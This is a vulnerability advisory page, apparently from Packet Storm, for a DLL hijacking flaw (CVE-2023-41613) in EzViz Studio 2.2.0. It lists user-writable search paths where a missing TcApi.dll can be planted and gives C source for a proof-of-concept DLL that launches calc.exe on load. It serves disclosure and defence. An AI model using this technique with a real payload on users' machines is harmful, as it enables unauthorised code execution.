Lucene search

K
packetstormEAFZPACKETSTORM:175684
HistoryNov 15, 2023 - 12:00 a.m.

EzViz Studio 2.2.0 DLL Hijacking

2023-11-1500:00:00
EAFZ
packetstormsecurity.com
239
ezviz studio
dll hijacking
windows 11

7.4 High

AI Score

Confidence

Low

0.0004 Low

EPSS

Percentile

14.2%

`PoC:  
  
*DLL Hijacking via EzViz Studio (Reported by EAFZ from Pythongoras)*  
  
*Author: EAFZ aka myantti3m*  
  
*CVE: **CVE**-2023-41613.*  
  
*Test Environment:*  
  
OS: Windows 11 Pro 64 bit(10.0, Build 2261)  
  
EzViz Studio version: 2.2.0  
  
*Technical Description *  
  
*1. **Technical Description *  
  
EzvizStudio.exe searches for a DLL called TcApi.dll. Because TcApi.dll  
doesn’t exist in any of the paths of the DLL search order. In particular,  
some paths have writable permissions for normal users as:  
  
· C:\Users\<Username>\AppData\Local\Programs\Microsoft VS  
Code\bin\TcApi.dll  
  
· C:\Users\<Username>\AppData\Local\Microsoft\WindowsApps\TcApi.dll  
  
So we can plant “malicious” TcApi.dll inside these directories and wait  
until the application will load it.  
  
*POC*  
  
We created a malicious DLL file (TcApi.dll) and complied it. In our case,  
it opens calc.exe. You can see the code below:  
  
#include <windows.h>  
  
#pragma comment (lib, "user32.lib")  
  
#include "pch.h"  
  
#include <iostream>  
  
#include <stdlib.h>  
  
BOOL APIENTRY DllMain(HMODULE hModule,  
  
DWORD nReason, LPVOID lpReserved) {  
  
switch (nReason) {  
  
case DLL_PROCESS_ATTACH:  
  
system("calc.exe");  
  
  
  
break;  
  
case DLL_PROCESS_DETACH:  
  
break;  
  
case DLL_THREAD_ATTACH:  
  
break;  
  
case DLL_THREAD_DETACH:  
  
break;  
  
}  
  
return TRUE;  
  
}  
  
Copy “malicious” TcApi.dll to  
  
C:\Users\<Username>\AppData\Local\Microsoft\WindowsApps\TcApi.dll  
  
If we run the EzVizStudio again, the code from the “malicious” DLL runs  
  
  
  
`

7.4 High

AI Score

Confidence

Low

0.0004 Low

EPSS

Percentile

14.2%

Related for PACKETSTORM:175684